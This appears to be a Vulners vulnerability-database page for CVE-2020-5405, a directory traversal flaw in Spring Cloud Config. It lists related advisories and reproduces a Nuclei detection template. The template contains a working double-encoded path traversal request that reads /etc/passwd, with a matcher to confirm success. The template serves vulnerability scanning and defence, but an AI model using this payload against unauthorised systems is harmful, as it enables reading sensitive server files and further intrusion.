| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities | 2 Jul 202019:10 | – | ibm | |
| CVE-2020-5405 | 22 Aug 202521:02 | – | circl | |
| CVE-2020-5405 | 5 Mar 202019:00 | – | cve | |
| CVE-2020-5405 Directory Traversal with spring-cloud-config-server | 5 Mar 202019:00 | – | cvelist | |
| Directory traversal attack in Spring Cloud Config | 5 Jun 202016:11 | – | github | |
| CVE-2020-5405 | 5 Mar 202019:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | – | openvas | |
| CVE-2020-5405 | 5 Mar 202019:15 | – | osv | |
| GHSA-G86W-V5VG-9GXF Directory traversal attack in Spring Cloud Config | 5 Jun 202016:11 | – | osv | |
| Directory traversal | 5 Mar 202019:15 | – | prion |
id: CVE-2020-5405
info:
name: Spring Cloud Config - Local File Inclusion
author: harshbothra_
severity: medium
description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
remediation: |
Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.
reference:
- https://pivotal.io/security/cve-2020-5405
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
- https://github.com/Secxt/FINAL
- https://github.com/pen4uin/vulnerability-research-list
- https://github.com/sobinge/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2020-5405
cwe-id: CWE-22,CWE-23
epss-score: 0.6876
epss-percentile: 0.99258
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vmware
product: spring_cloud_config
tags: cve2020,cve,lfi,springcloud,vmware,vuln
http:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100f955b5609b66a52c0c6e9a13890f562c13a6d9c1fc471c2904b321ad234f48ea022100aa525d2de9291dc4b911fecec68acb070f5a229f953b009997f0e69cb79d1f9f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation